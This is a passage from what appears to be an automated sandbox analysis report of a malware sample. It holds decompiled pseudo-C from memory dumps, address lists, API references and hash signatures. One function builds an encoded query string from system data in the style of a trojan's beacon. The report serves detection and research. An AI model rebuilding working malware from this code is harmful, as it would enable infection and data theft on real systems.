										_t84 =  *0x2b8a380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x2b8a3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x2b8a380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x2b8a388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x2b8a384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x2b8a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2b8a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x2b8a3c8 = 1;
							__eflags =  *0x2b8a3c8;
							if( *0x2b8a3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x2b8a388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x2b8a388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x2b8a3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x2b8a388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x2b8a380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x2b8a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2b8a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x02b8855b
0x02b8855e
0x02b88564
0x02b88582
0x00000000
0x02b88582
0x02b8856c
0x02b88575
0x02b8857b
0x02b8858a
0x02b8858d
0x02b88590
0x02b8859a
0x02b8859a
0x02b8859c
0x02b8859f
0x02b885a1
0x02b885a1
0x02b885a3
0x02b885a6
0x00000000
0x00000000
0x02b885a8
0x02b885aa
0x02b88610
0x02b88610
0x02b8876e
0x00000000
0x02b8876e
0x02b885ac
0x02b885ac
0x02b885b0
0x02b885b2
0x02b885b2
0x02b885b2
0x02b885b2
0x02b885b5
0x02b885b6
0x02b885b9
0x02b885b9
0x02b885bd
0x02b885c1
0x02b885cf
0x02b885cf
0x02b885d7
0x02b885dd
0x02b885df
0x02b885e1
0x02b885f1
0x02b885fe
0x02b88602
0x02b88607
0x02b88609
0x02b88687
0x02b88687
0x02b8860b
0x02b8860b
0x02b8860b
0x02b88689
0x02b8868b
0x02b8876c
0x02b8876c
0x00000000
0x02b88691
0x02b88691
0x02b88698
0x00000000
0x00000000
0x02b8869e
0x02b886a2
0x02b886fe
0x02b88700
0x02b88708
0x02b8870a
0x02b8870c
0x00000000
0x00000000
0x02b8870e
0x02b88714
0x02b88716
0x02b88718
0x02b8872d
0x02b8872d
0x02b8872f
0x02b8875e
0x02b88765
0x00000000
0x02b88765
0x02b88733
0x02b88734
0x02b88736
0x02b88738
0x02b88738
0x02b8873a
0x02b8873c
0x02b8873e
0x02b88752
0x02b88752
0x02b88755
0x02b88757
0x02b88757
0x02b88758
0x02b88758
0x00000000
0x02b88740
0x02b88740
0x02b88740
0x02b88749
0x02b8874a
0x02b8874c
0x02b8874e
0x02b8874e
0x00000000
0x02b88740
0x02b8873e
0x02b8871a
0x02b88721
0x02b88721
0x02b88723
0x00000000
0x00000000
0x02b88725
0x02b88726
0x02b88729
0x02b8872b
0x00000000
0x00000000
0x00000000
0x02b8872b
0x00000000
0x02b88721
0x02b886a4
0x02b886a7
0x02b886ac
0x00000000
0x00000000
0x02b886b5
0x02b886b7
0x02b886bd
0x00000000
0x00000000
0x02b886c3
0x02b886c9
0x00000000
0x00000000
0x02b886cf
0x02b886d1
0x02b886da
0x02b886de
0x00000000
0x00000000
0x02b886e4
0x02b886e7
0x02b886e9
0x00000000
0x00000000
0x02b886f0
0x02b886f2
0x00000000
0x00000000
0x02b886f4
0x02b886f8
0x00000000
0x00000000
0x00000000
0x02b886f8
0x00000000
0x00000000
0x00000000
0x02b885e3
0x02b885e3
0x02b885e3
0x02b885ea
0x00000000
0x00000000
0x02b885ec
0x02b885ed
0x02b885ef
0x00000000
0x00000000
0x00000000
0x02b885ef
0x02b88617
0x02b88619
0x00000000
0x00000000
0x02b88629
0x02b8862b
0x02b8862d
0x00000000
0x00000000
0x02b88633
0x02b8863a
0x02b88666
0x02b88666
0x02b88668
0x02b8866a
0x02b8867e
0x02b88680
0x00000000
0x00000000
0x00000000
0x00000000
0x02b8866c
0x02b8866c
0x02b8866c
0x02b88675
0x02b88676
0x02b88678
0x02b8867a
0x02b8867a
0x00000000
0x02b8866c
0x02b8863c
0x02b8863c
0x02b8863f
0x02b88641
0x02b88653
0x02b88653
0x02b88656
0x02b88658
0x02b88658
0x02b88659
0x02b88659
0x02b8865f
0x02b8865f
0x00000000
0x00000000
0x00000000
0x00000000
0x02b88643
0x02b88643
0x02b88643
0x02b8864a
0x00000000
0x00000000
0x02b8864c
0x02b8864c
0x02b8864d
0x00000000
0x00000000
0x00000000
0x02b8864d
0x02b8864f
0x02b88651
0x02b88664
0x00000000
0x00000000
0x00000000
0x02b88664
0x00000000
0x02b88651
0x02b885c3
0x02b885c6
0x02b885c9
0x00000000
0x00000000
0x02b885cb
0x02b885cd
0x00000000
0x00000000
0x00000000
0x02b885cd
0x02b88592
0x02b88594
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02B88602

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: bef18e69e025b59d8647fc8cc00f8a02c520a097cd2081cbb44f8c22f8857573
Instruction ID: f8466f19467012429d672354438bdbb770ffd7bd0852366afb2f0c200f364e88
Opcode Fuzzy Hash: bef18e69e025b59d8647fc8cc00f8a02c520a097cd2081cbb44f8c22f8857573
Instruction Fuzzy Hash: A561E435A0060E8FCB29EE28D99076973F2FB85758FA484E9D41ECB291E731D842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B8832C Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E02B8832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E02B88497(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E02B88551(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E02B8843C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E02B88497(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E02B88533(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x02b88330
0x02b88331
0x02b88332
0x02b88335
0x02b88337
0x02b8833a
0x02b8833b
0x02b8833d
0x02b8833e
0x02b8833f
0x02b88342
0x02b8834c
0x02b883fd
0x02b88404
0x02b8840d
0x02b88352
0x02b88352
0x02b88358
0x02b8835e
0x02b88361
0x02b88364
0x02b88368
0x02b8836d
0x02b88372
0x02b883f2
0x00000000
0x02b88374
0x02b88374
0x02b88380
0x02b88382
0x02b883dd
0x02b883dd
0x02b883e3
0x00000000
0x02b88384
0x02b88393
0x02b88395
0x02b88396
0x02b88397
0x02b8839a
0x02b8839a
0x02b8839c
0x00000000
0x02b8839e
0x02b8839e
0x02b883e8
0x02b883a0
0x02b883a0
0x02b883a4
0x02b883ac
0x02b883b1
0x02b883b6
0x02b883c2
0x02b883ca
0x02b883d1
0x02b883d7
0x02b883db
0x00000000
0x02b883db
0x02b8839e
0x02b8839c
0x00000000
0x02b88382
0x02b883f6
0x02b883f6
0x02b883f6
0x02b88372
0x02b88412
0x02b88419

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: b8567c939cf2635c071ed65a7c2da9612f1b72c685b7e915040422d7bd12ce2e
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 392188729002089FCB14FF68C8C09ABBBA6FF45350B89C5E9E9599B245D730F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D523B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d4c000_server.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: f94cc29b005e64b51beb5d0a6b67706dea4bd681106e3285ca87f685b2eed99b
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: D011AC72340110AFEB44CE55DC84EA673EAEB98360B198069ED08CB301D6B5EC42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B60D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b60000_server.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: bcbf154be7a6a99d141d2e42942c49ed1cff0a632a0504420df9c9943a90c23a
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 4701F272A106008FDF21EF61C808BBE33E5FB86206F0549E4D90B97281E378A8418F80

Uniqueness

Uniqueness Score: -1.00%

Function 02B82B91 Relevance: 37.8, APIs: 25, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E02B82B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x2b8a018; // 0x1cbd107f
				asm("bswap eax");
				_t70 =  *0x2b8a014; // 0x80659e7b
				asm("bswap eax");
				_t71 =  *0x2b8a010; // 0x80f8840a
				asm("bswap eax");
				_t72 =  *0x2b8a00c; // 0xef55b4f9
				asm("bswap eax");
				_t73 =  *0x2b8a348; // 0x29fd5b8
				_t3 = _t73 + 0x2b8b5ac; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x2b8a02c,  *0x2b8a004, _t68);
				_t76 = E02B8467F();
				_t77 =  *0x2b8a348; // 0x29fd5b8
				_t4 = _t77 + 0x2b8b575; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x2b8a348; // 0x29fd5b8
					_t8 = _t148 + 0x2b8b508; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x2b8a348; // 0x29fd5b8
				_t10 = _t81 + 0x2b8b89e; // 0x5588e56
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x2b8b246; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x2b8a36c; // 0x55895c0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x2b8a348; // 0x29fd5b8
					_t16 = _t144 + 0x2b8b8be; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E02B8472F(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x2b8a348; // 0x29fd5b8
					_t19 = _t139 + 0x2b8b8d0; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x2b8a2d8, 0, _a40);
				}
				_t87 = E02B81340();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x2b8a348; // 0x29fd5b8
					_t23 = _t135 + 0x2b8b8c5; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x2b8a2d8, 0, _a40);
				}
				_t166 =  *0x2b8a3cc; // 0x5589610
				_t89 = E02B86B59(0x2b8a00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x2b8a2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x2b8a2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x2b8a2d8, _t172, _a8);
						goto L30;
					}
					E02B82915(GetTickCount());
					_t96 =  *0x2b8a3cc; // 0x5589610
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x2b8a3cc; // 0x5589610
					__imp__(_t100 + 0x40);
					_t102 =  *0x2b8a3cc; // 0x5589610
					_t168 = E02B86675(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x2b8a2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x2b89280);
					_push(_t168);
					_t108 = E02B87563();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x2b8a2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E02B86536( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E02B863F6();
						L26:
						HeapFree( *0x2b8a2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E02B86F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E02B8597D(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E02B861DA(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E02B8673A(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E02B861DA(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x02b82b91
0x02b82b91
0x02b82b95
0x02b82b9c
0x02b82ba6
0x02b82ba8
0x02b82ba8
0x02b82bb5
0x02b82bc0
0x02b82bc3
0x02b82bce
0x02b82bd1
0x02b82bd6
0x02b82bd9
0x02b82bde
0x02b82be1
0x02b82bed
0x02b82bfa
0x02b82bfc
0x02b82c02
0x02b82c07
0x02b82c12
0x02b82c14
0x02b82c17
0x02b82c1e
0x02b82c20
0x02b82c29
0x02b82c34
0x02b82c36
0x02b82c39
0x02b82c39
0x02b82c3b
0x02b82c40
0x02b82c40
0x02b82c48
0x02b82c4c
0x02b82c52
0x02b82c5d
0x02b82c5f
0x02b82c64
0x02b82c69
0x02b82c6c
0x02b82c71
0x02b82c7c
0x02b82c7e
0x02b82c81
0x02b82c81
0x02b82c83
0x02b82c8e
0x02b82c94
0x02b82c97
0x02b82c9c
0x02b82ca7
0x02b82ca9
0x02b82cb0
0x02b82cba
0x02b82cba
0x02b82cbc
0x02b82cc1
0x02b82cc7
0x02b82cca
0x02b82ccf
0x02b82cd9
0x02b82cdb
0x02b82cea
0x02b82cea
0x02b82cec
0x02b82cfa
0x02b82cff
0x02b82d01
0x02b82d07
0x02b82ee7
0x02b82eef
0x02b82efc
0x02b82d0d
0x02b82d19
0x02b82d1f
0x02b82d25
0x02b82eda
0x02b82ee5
0x00000000
0x02b82ee5
0x02b82d31
0x02b82d36
0x02b82d3f
0x02b82d50
0x02b82d54
0x02b82d5d
0x02b82d63
0x02b82d70
0x02b82d7d
0x02b82d83
0x02b82ecd
0x02b82ed8
0x00000000
0x02b82ed8
0x02b82d8f
0x02b82d95
0x02b82d96
0x02b82d9b
0x02b82da1
0x02b82ec3
0x02b82ecb
0x00000000
0x02b82ecb
0x02b82dab
0x02b82db2
0x02b82dbc
0x02b82dc2
0x02b82dcc
0x02b82dde
0x02b82de0
0x02b82de6
0x02b82eff
0x02b82eae
0x02b82eae
0x02b82eb3
0x02b82ebf
0x02b82ec1
0x00000000
0x02b82ec1
0x02b82df1
0x02b82df6
0x02b82dfc
0x02b82e07
0x02b82e12
0x02b82e16
0x02b82e1c
0x02b82e22
0x02b82e28
0x02b82e2b
0x02b82e31
0x02b82e34
0x02b82e39
0x02b82e3d
0x02b82e3d
0x02b82e4a
0x02b82e58
0x02b82e5d
0x02b82e5f
0x02b82e65
0x02b82e6b
0x02b82e6d
0x02b82e72
0x02b82e76
0x02b82e92
0x02b82e92
0x02b82e65
0x00000000
0x02b82e4c
0x02b82e51
0x02b82e94
0x02b82e98
0x02b82ea2
0x00000000
0x00000000
0x00000000
0x00000000
0x02b82ea2
0x02b82e53
0x00000000
0x02b82e53
0x02b82e4a

APIs

GetTickCount.KERNEL32 ref: 02B82BA8
wsprintfA.USER32 ref: 02B82BF5
wsprintfA.USER32 ref: 02B82C12
wsprintfA.USER32 ref: 02B82C34
wsprintfA.USER32 ref: 02B82C5B
wsprintfA.USER32 ref: 02B82C7C
wsprintfA.USER32 ref: 02B82CA7
HeapFree.KERNEL32(00000000,?), ref: 02B82CBA
wsprintfA.USER32 ref: 02B82CD9
HeapFree.KERNEL32(00000000,?), ref: 02B82CEA

Part of subcall function 02B86B59: RtlEnterCriticalSection.NTDLL(055895D0), ref: 02B86B75
Part of subcall function 02B86B59: RtlLeaveCriticalSection.NTDLL(055895D0), ref: 02B86B93

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B82D19
GetTickCount.KERNEL32 ref: 02B82D2B
RtlEnterCriticalSection.NTDLL(055895D0), ref: 02B82D3F
RtlLeaveCriticalSection.NTDLL(055895D0), ref: 02B82D5D

Part of subcall function 02B86675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866A0
Part of subcall function 02B86675: lstrlen.KERNEL32(00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866A8
Part of subcall function 02B86675: strcpy.NTDLL ref: 02B866BF
Part of subcall function 02B86675: lstrcat.KERNEL32(00000000,00000000), ref: 02B866CA
Part of subcall function 02B86675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02B83ECE,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866E7

StrTrimA.SHLWAPI(00000000,02B89280,?,05589610), ref: 02B82D8F

Part of subcall function 02B87563: lstrlen.KERNEL32(05589C00,00000000,00000000,00000000,02B83EF9,00000000), ref: 02B87573
Part of subcall function 02B87563: lstrlen.KERNEL32(?), ref: 02B8757B
Part of subcall function 02B87563: lstrcpy.KERNEL32(00000000,05589C00), ref: 02B8758F
Part of subcall function 02B87563: lstrcat.KERNEL32(00000000,?), ref: 02B8759A

lstrcpy.KERNEL32(00000000,?), ref: 02B82DB2
lstrcpy.KERNEL32(?,?), ref: 02B82DBC
lstrcat.KERNEL32(?,?), ref: 02B82DCC
lstrcat.KERNEL32(?,00000000), ref: 02B82DD3

Part of subcall function 02B86536: lstrlen.KERNEL32(?,00000000,05589E08,00000000,02B86F0A,0558A02E,43175AC3,?,?,?,?,43175AC3,00000005,02B8A00C,4D283A53,?), ref: 02B8653D
Part of subcall function 02B86536: mbstowcs.NTDLL ref: 02B86566
Part of subcall function 02B86536: memset.NTDLL ref: 02B86578

wcstombs.NTDLL ref: 02B82E76

Part of subcall function 02B8597D: SysAllocString.OLEAUT32(?), ref: 02B859B8

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

HeapFree.KERNEL32(00000000,?), ref: 02B82EBF
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B82ECB
HeapFree.KERNEL32(00000000,?,?,05589610), ref: 02B82ED8
HeapFree.KERNEL32(00000000,?), ref: 02B82EE5
HeapFree.KERNEL32(00000000,?), ref: 02B82EEF

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 1185349883-0
Opcode ID: d36031df8e3ece2403ef525267d1aa8bfeca2b614a57aec5a106d589fd0fab1d
Instruction ID: b313853fc645ffd42187a291cd0624bc4ba8881a5aeb2c6960fce26412fba80c
Opcode Fuzzy Hash: d36031df8e3ece2403ef525267d1aa8bfeca2b614a57aec5a106d589fd0fab1d
